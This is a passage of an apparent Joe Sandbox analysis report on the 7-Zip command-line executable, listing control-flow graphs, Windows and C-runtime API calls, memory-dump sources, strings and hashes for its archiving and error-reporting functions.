                                                • Part of subcall function 004794A8: free.MSVCRT ref: 004794E3
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 004794F0
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 0047951C
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 00479525
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 0047952D
                                                • Part of subcall function 004794A8: free.MSVCRT ref: 0047953A
                                              • free.MSVCRT ref: 0047AEC2
                                                • Part of subcall function 0045339C: free.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533D7
                                                • Part of subcall function 0045339C: memmove.MSVCRT(00000000,?,?,00000000,004510A8), ref: 004533F2
                                                • Part of subcall function 0047A9FC: free.MSVCRT ref: 0047AA95
                                                • Part of subcall function 0047A9FC: free.MSVCRT ref: 0047AAC5
                                                • Part of subcall function 0047A9FC: free.MSVCRT ref: 0047AAD2
                                              • free.MSVCRT ref: 0047AEFA
                                              • GetProcAddress.KERNEL32 ref: 0047AF4D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove$AddressProc
                                              • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                              • API String ID: 4053071709-2499791885
                                              • Opcode ID: 49897bd600964b7250bd5654ca47cfa04bf3f5e284a770e6dc7ec91d1cebdbd3
                                              • Instruction ID: 52801694beeb853aa65d3ed3ded0dc5bf05defc99774d71354031f35ec3e08ed
                                              • Opcode Fuzzy Hash: 49897bd600964b7250bd5654ca47cfa04bf3f5e284a770e6dc7ec91d1cebdbd3
                                              • Instruction Fuzzy Hash: 1EB1B166205A8196CB30EB22E5803AFB361F3C1789F508117EB8D47B25DB7CC969C70A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3343 491850-491886 EnterCriticalSection 3344 491888-49188e call 49b1c8 3343->3344 3345 4918b1-4918bb 3343->3345 3349 491893-4918ac 3344->3349 3347 4918bd call 4522e4 3345->3347 3348 4918c2-4918c4 3345->3348 3347->3348 3351 4918ca-4918d2 3348->3351 3352 491991-49199e 3348->3352 3349->3345 3355 49191a-49192b 3351->3355 3356 4918d4-4918da 3351->3356 3353 491a4e-491a57 LeaveCriticalSection 3352->3353 3354 4919a4-4919a7 3352->3354 3357 491a59-491a62 3353->3357 3354->3353 3358 4919ad-4919b7 3354->3358 3359 49196a-491974 3355->3359 3360 49192d-49193a call 452300 3355->3360 3356->3355 3361 4918dc-4918e2 3356->3361 3362 4919b9-4919d7 call 452300 fputs 3358->3362 3363 491a31-491a4c LeaveCriticalSection 3358->3363 3359->3363 3365 49197a-491981 3359->3365 3360->3359 3375 49193c-491965 fputs call 4526a0 call 452300 3360->3375 3366 4918ed 3361->3366 3367 4918e4-4918eb 3361->3367 3378 4919d9-4919f0 fputs 3362->3378 3379 4919f2-491a14 call 456618 call 452320 free 3362->3379 3363->3357 3365->3363 3371 491987-49198c call 4522e4 3365->3371 3368 4918f4-4918fe 3366->3368 3367->3368 3368->3359 3373 491900-491913 fputs call 452300 3368->3373 3371->3363 3381 491918 3373->3381 3375->3359 3382 491a19-491a2c call 452300 call 4522e4 3378->3382 3379->3382 3381->3359 3382->3363
                                              APIs
                                              • EnterCriticalSection.KERNEL32 ref: 00491877
                                              • fputs.MSVCRT ref: 0049190A
                                              • LeaveCriticalSection.KERNEL32 ref: 00491A44
                                                • Part of subcall function 0049B1C8: memset.MSVCRT ref: 0049B20D
                                                • Part of subcall function 0049B1C8: fputs.MSVCRT ref: 0049B232
                                              • fputs.MSVCRT ref: 0049194D
                                                • Part of subcall function 004526A0: fputs.MSVCRT ref: 004526C1
                                              • fputs.MSVCRT ref: 004919CB
                                              • fputs.MSVCRT ref: 004919EA
                                              • LeaveCriticalSection.KERNEL32 ref: 00491A51
                                                • Part of subcall function 00452300: fputc.MSVCRT ref: 00452311
                                              • free.MSVCRT ref: 00491A14
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                              • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                              • API String ID: 676172275-580504279
                                              • Opcode ID: 2cc58bddada0519040ac4fc79ebe370a0d8e08b52278b0a9666f8cd599c93609
                                              • Instruction ID: 1b7202460edc338f53a4df802025d10fc450827f6423d90cc23cfe86bb622cbe
                                              • Opcode Fuzzy Hash: 2cc58bddada0519040ac4fc79ebe370a0d8e08b52278b0a9666f8cd599c93609
                                              • Instruction Fuzzy Hash: 9D5180A2341A82A2DF199B26D9903AE6720F785B94F444137DF2E47761DF7CD8A9C308

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3392 4738e8-473977 call 471700 call 47373c memmove 3397 473992-4739a5 3392->3397 3398 473979-47398d call 473864 free 3392->3398 3399 473a30-473a3d call 473864 3397->3399 3400 4739ab 3397->3400 3408 473cb6-473cc9 3398->3408 3409 473a65-473a77 3399->3409 3410 473a3f-473a64 call 4702a0 _CxxThrowException 3399->3410 3403 4739ae-4739c2 3400->3403 3406 4739c4-4739ec call 4709e0 call 452130 3403->3406 3407 473a1d-473a25 3403->3407 3424 4739ee-4739f9 call 453314 3406->3424 3425 4739fb 3406->3425 3407->3403 3412 473a27-473a2b 3407->3412 3415 473ae1-473b27 call 485f5c call 4713e8 * 2 3409->3415 3416 473a79-473a7c 3409->3416 3410->3409 3412->3399 3439 473b2d-473b30 3415->3439 3440 473c2a-473c46 free 3415->3440 3420 473a7e-473aac call 453208 call 456e10 call 452130 3416->3420 3445 473aae-473abb call 453314 3420->3445 3446 473abd 3420->3446 3430 4739fe-473a16 call 45b8f0 free 3424->3430 3425->3430 3430->3407 3444 473b33-473b56 call 452130 3439->3444 3442 473c76-473c84 free 3440->3442 3443 473c48 3440->3443 3450 473c88-473c95 3442->3450 3449 473c4c-473c5f 3443->3449 3459 473b68 3444->3459 3460 473b58-473b66 call 453314 3444->3460 3448 473ac0-473adf call 45b8f0 free 3445->3448 3446->3448 3448->3415 3448->3420 3455 473c71-473c74 3449->3455 3456 473c61-473c6c free * 2 3449->3456 3457 473ca7-473caa 3450->3457 3458 473c97-473ca2 free * 2 3450->3458 3455->3442 3455->3449 3456->3455 3457->3450 3462 473cac-473cb4 free 3457->3462 3458->3457 3464 473b6b-473ba1 call 452130 3459->3464 3460->3464 3462->3408 3468 473bb3 3464->3468 3469 473ba3-473bb1 call 453314 3464->3469 3471 473bb6-473bc6 3468->3471 3469->3471 3473 473be4-473bf2 3471->3473 3474 473bc8-473be2 call 454338 3471->3474 3473->3444 3475 473bf8 3473->3475 3474->3473 3478 473bfa-473c29 call 4702a0 _CxxThrowException 3474->3478 3475->3440 3478->3440
                                              APIs
                                                • Part of subcall function 0047373C: free.MSVCRT ref: 004737FB
                                              • memmove.MSVCRT ref: 0047396F
                                              • free.MSVCRT ref: 00473986
                                              • free.MSVCRT ref: 00473A11
                                              • _CxxThrowException.MSVCRT ref: 00473A5F
                                              • free.MSVCRT ref: 00473AD3
                                                • Part of subcall function 00473864: free.MSVCRT ref: 00473877
                                                • Part of subcall function 00473864: free.MSVCRT ref: 00473892
                                                • Part of subcall function 00473864: free.MSVCRT ref: 0047389B
                                                • Part of subcall function 00473864: free.MSVCRT ref: 004738C6
                                                • Part of subcall function 00473864: free.MSVCRT ref: 004738CE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ExceptionThrowmemmove
                                              • String ID: Cannot find archive$Duplicate archive path:
                                              • API String ID: 3934437811-2067063536
                                              • Opcode ID: 15ebe3c882bc9668213b7dd33c6c16c3777921ba145b699e337e3eca45f7d6ba
                                              • Instruction ID: 15e4043ae550d63ea8f2deef34265ad2e643ff2cab38005d18fa1e05a8ae09f2
                                              • Opcode Fuzzy Hash: 15ebe3c882bc9668213b7dd33c6c16c3777921ba145b699e337e3eca45f7d6ba
                                              • Instruction Fuzzy Hash: 21A15D73315A8582CA20EF26E49159FB3A1F785B85F408517EF8E07B29DE7CC946DB08

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3481 4842a2-4842c0 3483 4842c2-4842d0 3481->3483 3484 4842d5-4842d8 3481->3484 3483->3484 3485 4842da 3484->3485 3486 4842e0-4843ab call 4740c4 memmove call 453404 call 483a20 3484->3486 3485->3486 3494 4845d8-48468f call 453404 * 3 free * 2 call 47419c 3486->3494 3495 4843b1-4843b3 3486->3495 3533 484698-4846a0 3494->3533 3534 484691-484697 3494->3534 3497 4843b9-4843d7 call 47c684 3495->3497 3498 4846c5-4846f4 free * 2 call 47419c 3495->3498 3505 484728-484757 free * 2 call 47419c 3497->3505 3506 4843dd-4843ef call 452130 3497->3506 3508 4846fd-484705 3498->3508 3509 4846f6-4846fc 3498->3509 3525 484759-48475f 3505->3525 3526 484760-484768 3505->3526 3521 4843f1-484401 call 47caac 3506->3521 3522 484403 3506->3522 3511 48470e-484719 3508->3511 3512 484707-48470d 3508->3512 3509->3508 3517 48471b 3511->3517 3518 484721-484723 3511->3518 3512->3511 3517->3518 3524 4847fe-484811 3518->3524 3531 484406-484441 call 45b8f0 free * 2 call 47419c 3521->3531 3522->3531 3525->3526 3528 48476a-484770 3526->3528 3529 484771-48477c 3526->3529 3528->3529 3535 48477e 3529->3535 3536 484784-484786 3529->3536 3551 48444a-484452 3531->3551 3552 484443-484449 3531->3552 3541 4846a9-4846b4 3533->3541 3542 4846a2-4846a8 3533->3542 3534->3533 3535->3536 3536->3524 3543 4847f2-4847fb 3536->3543 3541->3543 3546 4846ba-4846c0 3541->3546 3542->3541 3543->3524 3546->3543 3553 48445b-48446c 3551->3553 3554 484454-48445a 3551->3554 3552->3551 3555 483fa9-484033 memmove 3553->3555 3556 484472-484478 3553->3556 3554->3553 3561 484054-484072 memmove 3555->3561 3562 484035-484052 memmove 3555->3562 3556->3555 3561->3543 3563 484078-4840e9 memmove call 47c0fc call 453404 * 2 call 483d58 3561->3563 3562->3563 3573 4840ee-4840f2 3563->3573 3574 4840f8-48410a call 452130 3573->3574 3575 48447d-484480 3573->3575 3583 48410c-48411c call 47caac 3574->3583 3584 48411e 3574->3584 3576 48450c-48451b call 47419c 3575->3576 3577 484486-48450b call 453404 * 3 3575->3577 3576->3524 3577->3576 3588 484121-48413a call 45b8f0 call 47419c 3583->3588 3584->3588
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID:
                                              • API String ID: 1534225298-3916222277
                                              • Opcode ID: 3aa71f5739002ec70ae4d321f5bd210f1a65664215592b72844cec7c5cd73cb9
                                              • Instruction ID: b0456906996e2eab2da10ce03bc4c40cc02043d2eac5dc0786de016a5acb5cb1
                                              • Opcode Fuzzy Hash: 3aa71f5739002ec70ae4d321f5bd210f1a65664215592b72844cec7c5cd73cb9
                                              • Instruction Fuzzy Hash: 65D13D33209AC596CA21EF66E09029FBB60F7C6B85F445416DB8E47B2ADF7CC549CB04
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: AddressProc$memmove
                                              • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                              • API String ID: 2879976980-73314117
                                              • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                              • Instruction ID: c758bebbf1dc0cc9341b2749d715278d62d89dfaa2b98928af33d04d68eae541
                                              • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                              • Instruction Fuzzy Hash: 02416776315A4196DB20DF25E88079EB361F788788F40852AEB8E83764DF7CC949CB08
                                              APIs
                                              • fputs.MSVCRT ref: 00491CF9
                                                • Part of subcall function 0049B1C8: memset.MSVCRT ref: 0049B20D
                                                • Part of subcall function 0049B1C8: fputs.MSVCRT ref: 0049B232
                                                • Part of subcall function 00452300: fputc.MSVCRT ref: 00452311
                                              • fputs.MSVCRT ref: 00491DEE
                                              • fputs.MSVCRT ref: 00491F07
                                              • fputs.MSVCRT ref: 00491F5C
                                                • Part of subcall function 0049171C: fputs.MSVCRT ref: 00491744
                                                • Part of subcall function 0049171C: fputs.MSVCRT ref: 00491758
                                                • Part of subcall function 0049171C: free.MSVCRT ref: 0049176B
                                                • Part of subcall function 00456618: FormatMessageW.KERNEL32 ref: 00456676
                                                • Part of subcall function 00456618: LocalFree.KERNEL32 ref: 00456698
                                                • Part of subcall function 00452320: free.MSVCRT ref: 0045237E
                                                • Part of subcall function 00452320: fputs.MSVCRT ref: 004523B8
                                                • Part of subcall function 00452320: free.MSVCRT ref: 004523C4
                                              • free.MSVCRT ref: 00491F86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                              • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                              • API String ID: 2553544393-24972044
                                              • Opcode ID: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                              • Instruction ID: bf70029a80672a73a2fc98d779c342908178c7f9fcbcad10934d58e8cc996df9
                                              • Opcode Fuzzy Hash: 5ec651521e921188cfebbe0943830bcb464d12baf91779271459dbeb9241f1ce
                                              • Instruction Fuzzy Hash: 10A162663006869ACE29DF72D5903AE7B20F795B84F444127DF5E47721DFACE8A4C318
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ExceptionThrowfputs
                                              • String ID: Decoding ERROR
                                              • API String ID: 117389134-2585761706
                                              • Opcode ID: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                              • Instruction ID: d650e664c384f1d9eaacdc6015e8bfa5a4be9b446fe25c55d0109627ffbaca46
                                              • Opcode Fuzzy Hash: 3411419880789d43690792f4aa03f2aa0ef935c776cadf4be504cd4851e6c4ab
                                              • Instruction Fuzzy Hash: 2B31DEA23159C191CE30EB26E9803AE7B60F782794F444527CA8E47729DF7CC8A5CB49
                                              APIs
                                                • Part of subcall function 00456464: FreeLibrary.KERNELBASE(?,?,?,004564E7), ref: 00456475
                                                • Part of subcall function 00453404: free.MSVCRT ref: 00453431
                                                • Part of subcall function 00453404: memmove.MSVCRT ref: 0045344C
                                              • GetProcAddress.KERNEL32 ref: 0047A8CA
                                              • GetProcAddress.KERNEL32 ref: 0047A8E8
                                              • GetProcAddress.KERNEL32 ref: 0047A908
                                              • free.MSVCRT ref: 0047A985
                                              • free.MSVCRT ref: 0047A996
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: AddressProcfree$FreeLibrarymemmove
                                              • String ID: CreateObject$SetCaseSensitive$SetLargePageMode
                                              • API String ID: 852969883-606380122
                                              • Opcode ID: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                              • Instruction ID: 4643bd0611c2a185b44ff007a679884698a86ca2d8433e9b17eb2a23edbee561
                                              • Opcode Fuzzy Hash: 710e18dece972f2a263eb770059622d89b70c4050ec211417c46d53ec9b2e5f3
                                              • Instruction Fuzzy Hash: 3A41B4A2300B4086DB20EF26E85079F6360FB85B98F4885269F8E47765DF3CC85AC709
                                              APIs
                                              • strcmp.MSVCRT ref: 0049B723
                                              • fputs.MSVCRT ref: 0049B743
                                                • Part of subcall function 004538C8: memmove.MSVCRT(0045A0E5), ref: 00453907
                                                • Part of subcall function 00453A64: memmove.MSVCRT ref: 00453AAA
                                              • GetTickCount.KERNEL32 ref: 0049B49E
                                                • Part of subcall function 00453404: free.MSVCRT ref: 00453431
                                                • Part of subcall function 00453404: memmove.MSVCRT ref: 0045344C
                                              • strcmp.MSVCRT ref: 0049B4E3
                                              • wcscmp.MSVCRT ref: 0049B502
                                              • strcmp.MSVCRT ref: 0049B568
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                              • String ID: .
                                              • API String ID: 591578422-4150638102
                                              • Opcode ID: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                              • Instruction ID: 09ede43ab09f2479eedc8d23174090414f7ef8f060c932a93f277f42aa0e530b
                                              • Opcode Fuzzy Hash: 5acd8cd52b168fe2fc51d3cd0102c06d8f0252148c2191c97aee85e0001a7e08
                                              • Instruction Fuzzy Hash: B8A15B77700684E7CA19DF2AE68025E7761F345788F80812BDB5A47B11DF78E8BAC744
                                              APIs
                                              • fputs.MSVCRT ref: 00492F7E
                                              • fputs.MSVCRT ref: 00492F9D
                                              • free.MSVCRT ref: 00492FB6
                                              • free.MSVCRT ref: 00492FC1
                                                • Part of subcall function 00452C78: free.MSVCRT ref: 00452CAE
                                                • Part of subcall function 00452320: free.MSVCRT ref: 0045237E
                                                • Part of subcall function 00452320: fputs.MSVCRT ref: 004523B8
                                                • Part of subcall function 00452320: free.MSVCRT ref: 004523C4
                                              • free.MSVCRT ref: 00492FCC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$fputs
                                              • String ID: = $h<J
                                              • API String ID: 2444650769-2811932181
                                              • Opcode ID: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                              • Instruction ID: ce3d09edcd2b1ff014c312f9f2ee1948a2dd8d4b3ab2740632ac22e6aae9a8f6
                                              • Opcode Fuzzy Hash: 40218af8c8f5cebf14e2460a5095f74d7b39ca0d1f579d7e20a065c4070789fb
                                              • Instruction Fuzzy Hash: 10218E6330594091CE20EF26E68126EAB30E7D67D9F441237FF5E43A69DE6CC949C708
                                              APIs
                                                • Part of subcall function 00479BCC: free.MSVCRT(?,?,?,?,?,00000000,?,?,00479DE5), ref: 00479C11
                                                • Part of subcall function 00479BCC: free.MSVCRT(?,?,?,?,?,00000000,?,?,00479DE5), ref: 00479C19
                                                • Part of subcall function 00479BCC: free.MSVCRT(?,?,?,?,?,00000000,?,?,00479DE5), ref: 00479C3B
                                                • Part of subcall function 00479BCC: free.MSVCRT(?,?,?,?,?,00000000,?,?,00479DE5), ref: 00479D2A
                                              • wcscmp.MSVCRT ref: 00479E66
                                              • free.MSVCRT ref: 00479ECA
                                              • free.MSVCRT ref: 00479ED4
                                              • free.MSVCRT ref: 00479F13
                                              • free.MSVCRT ref: 00479F1B
                                              • free.MSVCRT ref: 00479F28
                                              • free.MSVCRT ref: 00479F49
                                              • free.MSVCRT ref: 00479F51
                                                • Part of subcall function 00453404: free.MSVCRT ref: 00453431
                                                • Part of subcall function 00453404: memmove.MSVCRT ref: 0045344C
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmovewcscmp
                                              • String ID:
                                              • API String ID: 3584677832-0
                                              • Opcode ID: d0aa5396e947f703ac514a2bac08324cffc8975aa9933586a56ea8b49374fbdb
                                              • Instruction ID: 37f36fcc5f6d98d45e865920ec07b3858417e81e1f676b5bff0d559aca8e4906
                                              • Opcode Fuzzy Hash: d0aa5396e947f703ac514a2bac08324cffc8975aa9933586a56ea8b49374fbdb
                                              • Instruction Fuzzy Hash: 5B41E323305A4191CA10EF16E94019FA721F782BE9F44522BEF6D47765DF7CC85AC708
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: _initterm$__getmainargs__set_app_type__setusermatherrexit
                                              • String ID:
                                              • API String ID: 852415323-0
                                              • Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                              • Instruction ID: 72cbb062bf334fe879a526b3d7fcf4c07038d5817edd2913e50efdb1b93a644a
                                              • Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
                                              • Instruction Fuzzy Hash: C8311AB1214B41CAEB50DF66E89075B7B61F394764F54423AEB6A837A4DF3CC849CB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: _initterm$__getmainargs__set_app_type__setusermatherrexit
                                              • String ID:
                                              • API String ID: 852415323-0
                                              • Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                              • Instruction ID: 031b4da7314b495a3e42156d036c3f942a124e6d3e791218dc216fc58a255610
                                              • Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
                                              • Instruction Fuzzy Hash: 9321F9B1214B4186EB10DF2AE89075A7B71F794764F501236EB6A837A4DF3CC849CB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
